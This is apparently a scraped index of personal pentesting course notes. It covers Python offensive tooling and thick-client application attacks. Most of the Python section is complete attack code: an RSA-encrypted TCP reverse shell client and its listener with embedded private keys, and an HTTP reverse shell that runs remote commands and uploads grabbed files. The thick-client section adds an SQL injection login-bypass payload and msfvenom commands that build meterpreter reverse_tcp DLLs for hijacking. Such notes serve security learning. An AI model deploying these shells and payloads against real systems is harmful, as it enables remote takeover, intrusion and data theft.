0HM\nHpJ7hUib/btWbX/zYQEwQRRCbHWGsxROumkJPgfRzPhDohDgv4ncrX0w7+4PESGp\n9MNZBa9kPuwDNFsVxIdpWZgmJdALqLwpWPnGswwVp6Lk1jMHD2GxLkknHLvfmND3\nfuqVj7k/bKFayqejlY2SyNUv/h+DsQQL2esM8A4TLGlFOgfaoz0wPii2HmANQPSa\n16xjV/0uQGHW260d1norNVZCmRDC3Gqz8/rcTGYwEkeCCQ3ctlUJyAFVu+ILyIga\n/kadDqiUkItIKl+fQI3stPyrHjh5cMUk+kPMjO36/yQ0f3Ox8cUkR5x3eW4RoFZQ\n/khhdDqVmieQ/wKCAQEA4H3GCf1LijS7069AEyvOKcKTL+nDGdqz+xMc+sbtha37\n8hh9mjvFaljJcKb4AxTTnT8RrCnabdtmuAXRsfHOu1BZdJAaW+hgWgY+PJL+XpBQ\n8D3954EvE2aX910DDMYz2slm0IL5we8KLg76ZHi+zO8woeedSD7yHbox6ybHZr0H\nL7G8fwI9zg/oz7+0P+vU3AV5hgnUDx5kY1hYNWmrBkgObRfJQNsiCDHkw6wRZPU+\nXESQX2iUnh8HA7idWvLELFXjueHxEw15yKaw9toiO0T1MhbrBBsjElXDk6WuKmVj\nC2/ZvG939IOO2cW8UeBdTABhO630QQdDtAk0YqILdwKCAQEAjm1UrSSL8LD+rPs4\nzdS40Ea+JkZSa8PBpEDrMzk2irjUiIlzY9W8zJq+tCCKBGoqFrUZE0BVX2xeS9ht\nN7nKK4U9cnezgCQ2tjVx1j2NsV5uODCbfXjSERo1T6PEZHdZ1NFlA0HjARuIY00r\n4zZyoX3lSbIV5828ft0V7+mZy389GM/XArK5TsULKR5mabPqlRQXrOr/TklUa/AZ\nva858Z7XyF7Sf7eMIsQaPPdYLQVdJ6G8Qo7FrjT2nf+DV5ZgkfTsoFymSdva0px/\n4PpeGjs/yvEfv4xvC2a+SXgEuOfaTFtXyoDkETmdx2twTB3lpF68Jrq85yJw4i7y\ndvkuLQKCAQBefJGeIr5orUlhD6Iob4eWjA7nW7yCZUrbom/QHWpbmZ8xhp1XDVFK\nMZSXla9NnLZ0uNb3X6ZQFshlLA3Wl7ArpuX/6acuh+AGBBqt5DCsHJH0jCMSDY2C\n3OuZccyW09V/gMWFfZshxTrDqAo7v5aPKx2NB69reRLu8C+Sif/jfixIJsbvrkHV\nOV0EE+wJ+3jcInHDuN9IfcJDDiwSTydsvWdVA23xnkn0qQtgUEwB8jcNHs6lWZ8z\n7ltFda7FWOi4wG3ZDwAoxMM9cOuK+sTtrViGfJ7uW32nefGXc2Sa85F8ftdmOISE\npdq6Tj+1NnoOQxqpw83KkQQuArHJ0eqBAoIBAQDPchq4XMwlEfjVjZCJEX++UyEA\n5H2hKbWOXU9WNhZCKmScrAlkW/6L0lHs1mngfxxavKOy2jIoUhb2/zeA/MKx6Jxa\nPqiKaOdqTYn6yaLkRS+7jUndDeFqDVCLqt3NprltVzLphjOB0I8PsUnIj5lKcE5K\nDjtbjnJYCjj0o346t3abOOoqxqYJmXgieRWkjjidkBOvL/Td7OZXM6jPVj744+ZE\nK2D/g7XtAIOACmSpYTtHRl7bxcoKP7QiPksNG17w+LWUqF2TwBexyCDKCV5XSIB9\nYVPwkPTGTNbOtTuTJk5hO+W4Nij4ERDdQlxd961YgRHORov+2sFREdhbrV0s\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApceMHQ9c5Cdf+qgd4ASP\nM7WNbKavEwat78bMHQVK6cRNm2XSWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4\nvVKOvrdmcmfnITEw/++pbvGZYRf2y0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex\n9LNJ98ipGeN6nBiaExI9he3PcivztD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05\nbc0MskjkhVaaN55eidzAXUmYmxyoLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCS\nxT/TuuFaDy6tfpfM+ePNEgeLjn7WAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9\nDgXPSp7ljV9SZ7eO9LZuiERz003NrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV\n/v25dqTXApO3QO/LZrJQ8twQyASR1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOa\nKDmu/QR5imLdjj3alVg69Ci3It3jTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMS\ni1BzDF46Q2XJwjgDnH5rk70n7sVquQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNF\np42v7EMaLohpnFm6yKiEm5UacMs7rLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wF\ndBPIb9wJyTjPYTiTJ3rDQGECAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command)\n        print (command)\n        if 'terminte' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            print (len(result))\n            if len(result) > 470:\n                for i in range(0, len(result), 470):\n                    chunk = result[0+i:470+i]\n                    s.send(encrypt(chunk))\n            else:\n                s.send(encrypt(result))\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-big-message","title":"RSA Enc Big Message","text":"
                                  from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    decrypt(encrypted_data)\n\nmessage = 'H'*500\n\nif len(message) > 470: # To check the size limitation of messages, which is 470 bites when key size is 4096 bits\n    for i in range(0, len(message), 470): # We will split the messages into chunks so it can be processed\n        chunk = message[0+i:470+i]\n        encrypt(chunk.encode())\nelse:\n    encrypt(message.encode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-small-messages","title":"RSA Enc Small messages","text":"
                                  from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    return encrypted_data\n\nmessage = 'H'*470 # Limitation on size of the clear text message is 470 bytes with a key size of 4096 bits\nencrypted_data = encrypt(message.encode())\n\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\ndecrypt(encrypted_data)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-server-side-shell","title":"RSA Server side shell","text":"
                                  import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    dec = decryptor.decrypt(cipher)\n    return dec.decode()\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n    conn, addr = s.accept()\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result))\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tunning-the-connection-attemps/","title":"Tunning the connection attempts","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/tunning-the-connection-attemps/#client-side","title":"Client side","text":"

                                  We put our previous http shell in a function called connect.

                                  import requests\nimport os\nimport subprocess\nimport time\n\nimport random # Needed to generate random \n\n\ndef connect(): # we put our previous http shell in a function called connect\n\n    while True:\n\n        req = requests.get('http://127.0.0.1:8080')\n        command = req.text\n\n        if 'terminate' in command:\n            return 1 # if we got terminate order, then we exit connect function and return a value of 1, this value will be used to end up the whole script\n\n\n        elif 'grab' in command:\n            grab, path = command.split(\"*\")\n            if os.path.exists(path):\n                url = \"http://127.0.0.1:8080/store\"\n                files = {'file': open(path, 'rb')}\n                r = requests.post(url, files=files)\n            else:\n                post_response = requests.post(url='http://127.0.0.1:8080', data='[-] Not able to find the file!'.encode())\n        else:\n            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stdout.read())\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stderr.read())\n    time.sleep(3)\n\n\n# Here we start our infinite loop, we try to connect to our kali server, if we got an exception (connection error)\n# then we will sleep for a random time between 1 and 10 seconds and we will pass that exception and go back to the \n# infinite loop once again untill we got a sucessful connection. \n\n\nwhile True:\n    try:\n        if connect() == 1:\n            break\n    except:\n        sleep_for = random.randrange(1, 10)#Sleep for a random time between 1-10 seconds\n        time.sleep(int(sleep_for))\n        #time.sleep( sleep_for * 60 )      #Sleep for a random time between 1-10 minutes\n        pass\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"thick-applications/","title":"Introduction to Pentesting Thick Clients Applications","text":"

                                  Checklist for Pentesting Thick client applications

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.

                                  Thick clients applications are the applications that are run as standalone applications on the desktop. Thick clients have two attack surfaces:

                                  • Static.
                                  • Dynamic.

                                  They are quite different from web services in the sense that thick applications, most of the tasks are performed at the client end, so these apps heavily depend on client's system resources like CPU, RAM or memory, for instance.

                                  They are usually written in these languages:

                                  • .NET
                                  • C/C++
                                  • Java applets etc
                                  • Native android / IOS mobile applications: Objective C, swift
                                  • and more.

                                  They are considered old, but still might be found in some organizations.

                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#basic-architecture","title":"Basic Architecture","text":"
                                  • 1-Tier Architecture: It's a standalone application.
                                  • 2-Tier Architecture: EXE/web-based launcher / java-based app + database. Business logic will be in the application. The app directly communicates to the database server. Things to consider when pentesting: login or registering feature, DB connection, strings, TLS/SSL, Register keys.
                                  • 3-Tier Architecture: EXE + server + database. Business logic can be move to the server so security findings will be less common. These apps don't have proxy settings in them so for sending traffic to a proxy server, some changes need to be done in the system host file.
                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#some-decompilation-tools","title":"Some decompilation tools","text":"
                                  • C++ decompilation: https://ghidra-sre.org
                                  • C# decompilation: dnspy.
                                  • JetBrains dotPeek.
                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/","title":"Attacking thick clients applications: Data storage issues","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-hard-coded-credentials","title":"1. Hard Coded credentials","text":"

                                  Developer often stores hardcode sensitive details in thick clients.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#strings","title":"strings","text":"

                                  Strings comes in sysInternalsSuite. It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary:

                                  strings.exe C:\\Users\\admin\\Desktop\\tools\\original\\DVTA.exe > C:\\Users\\admin\\Desktop\\strings.txt\n

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#dnspy","title":"dnspy","text":"

                                  We know the FTP conection is done in the Admin screen, so we open the application with dnspy and we locate the button in the Admin screen that calls the FTP conection. Credentials for the conection can be there:

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-storing-sensitive-data-in-registry-entries","title":"2. Storing sensitive data in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#regshot","title":"regshot","text":"

                                  1. Run regshot version according to your thick-app (84 or 64 v).

                                  2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

                                  3. Open the app you want to test and login into it.

                                  4. Perform some kind of action, like for instance, viewing the profile.

                                  5. Take a \"Second shot\" of the Registry entries.

                                  6. After that, you will see the button \"Compare\" enabled. Click on it.

                                  An HTML file will be generated and you will see the registry entries:

                                  An interesting registry is \"isLoggedIn\", that has change from false to true. This may be a potential vector of attack (we could set it to true and also change username to admin).

                                  HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-database-connection-strings-in-memory","title":"3. Database connection strings in memory","text":"

                                  When doing a connection to database, that string that does it may be:

                                  • in clear text
                                  • or encrypted.

                                  If encrypted, it 's still possible to find it in memory. If we can dump the memory of the process we should be able to find the clear text conection string in memory.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#process-hacker-tool","title":"Process Hacker tool","text":"

                                  Download from: https://processhacker.sourceforge.io/downloads.php

                                  We will be using the portable version.

                                  1. Open the application you want to test.

                                  2. Open Process Hacker Tool.

                                  3. Select the application, click right on \"Properties\".

                                  4. Select tab \"Memory\".

                                  5. Click on \"Strings\".

                                  6. Check \"Image\" and \"Mapped\" and search!

                                  7. In the results you can use the Filter option to search for (in this case) \"data source\".

                                  Other possible searches: Decrypt. Clear text conection string in memory reveals credentials: powned!!!

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-sql-injection","title":"4. SQL injection","text":"

                                  If input is not sanitize, when login into an app we could deceive the logic of the request to the database:

                                  select * from users username='x' and password='x';\n

                                  In the DVTA app, we could try to do this:

                                  select * from users username='x' or 'x'='x' and password='' or 'x'='x';\n

                                  For that we only need to enter this into the login page:

                                  x' or 'x'='x\n

                                  And now we are ... raymond!!!

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#5-side-channel-data-leaks","title":"5. Side channel data leaks","text":"

                                  Application logs are an example of side channel data leaks. Developers offen use logs for debugging purposes during development.

                                  Where can you find those files? For example in Console logs. Open the command prompt and run the vulnerable thick application this way:

                                  dvta.exe > C:/Users/admin/Desktop/dvta_logs.txt\n

                                  After that open the DVTA application, login as admin and do some actions. When done, close the application.

                                  If you want to add some more logs with a different user, open again the app from console and append the new outcome to the file:

                                  dvta.exe >> C:/Users/admin/Desktop/dvta_logs.txt\n

                                  Now, login into the app as a regular user and browse around.

                                  Open the file with the logs of the application and, if you are lucky and debug mode is still on, you will be able to see some stuff such as SQL queries, decrypted database passwords, users, temp location of the ftp file...

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#6-unreliable-data","title":"6. Unreliable data","text":"

                                  Some applications may log some data (for instance timestamp) for later use. If the user is able to tamper this data.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#7-dll-hijacking","title":"7. DLL Hijacking","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#what-is-dll-hijacking","title":"What is DLL Hijacking","text":"

                                  A Dynamic Link Library (DLL) file usually holds executable code that can be used by other application, meaning that can act as a Library. This makes DLL files very attractive to attackers because if they manage to deceive the application into using a different DLL (with the same name) then this action may end up in compromising the active.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-is-dll-hijacking-perform","title":"How is DLL Hijacking perform?","text":"

                                  When calling a DLL file, if an absolute path is not provided, then there are some techniques to deceive the app.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#placing-our-dll-in-the-directory-in-which-the-app-will-look","title":"Placing our DLL in the directory in which the app will look","text":"

                                  This is the expected DLL order:

                                  • The directory from which the application is loaded.
                                  • The current directory.
                                  • The system directory
                                    (C:\\\\Windows\\\\System\\\\)\n
                                  • The 16-bit system directory.
                                  • The Windows directory.
                                  • The directories that are listed in the PATH environment variable.
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-locate-interesting-dll-files-with-processmonitor-or-procmon","title":"1. Locate interesting DLL files with ProcessMonitor (or ProcMon)","text":"

                                  We can try to find some DLL files that the app is requesting but not finding. And for that we can use ProcessMonitor and some filters like:

                                  • Process Name is DVTA.exe
                                  • Result is NAME NOT FOUND
                                  • Path ends with dll.

                                  If you login into the app, you will find some DLL files that can be used to try an exploitation:

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-crafting-our-malicious-dll-and-serving-them-to-the-machine","title":"2. Crafting our malicious DLL and serving them to the machine","text":"

                                  We will be assuming we will try to deceive the app with these 2 files:

                                  • SECUR32.dll
                                  • DWrite.dll

                                  We will open a kali machine, we will craft two dll payloads using msfvenom, we will copy them into our root apacher server and we will launch apache to serve those two files. Commands:

                                  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n\n# Copying payloads to apache root folder\nsudo cp SECUR32.dll /var/www/html/\ncp SECUR32.dll DWrite.dll\nsudo cp DWrite.dll /var/www/html \n\n# starting apache\nservice apache2 start\n

                                  Now, in the Windows 10 VM (maybe after disabling RealTime protection), we can retrieve those files with:

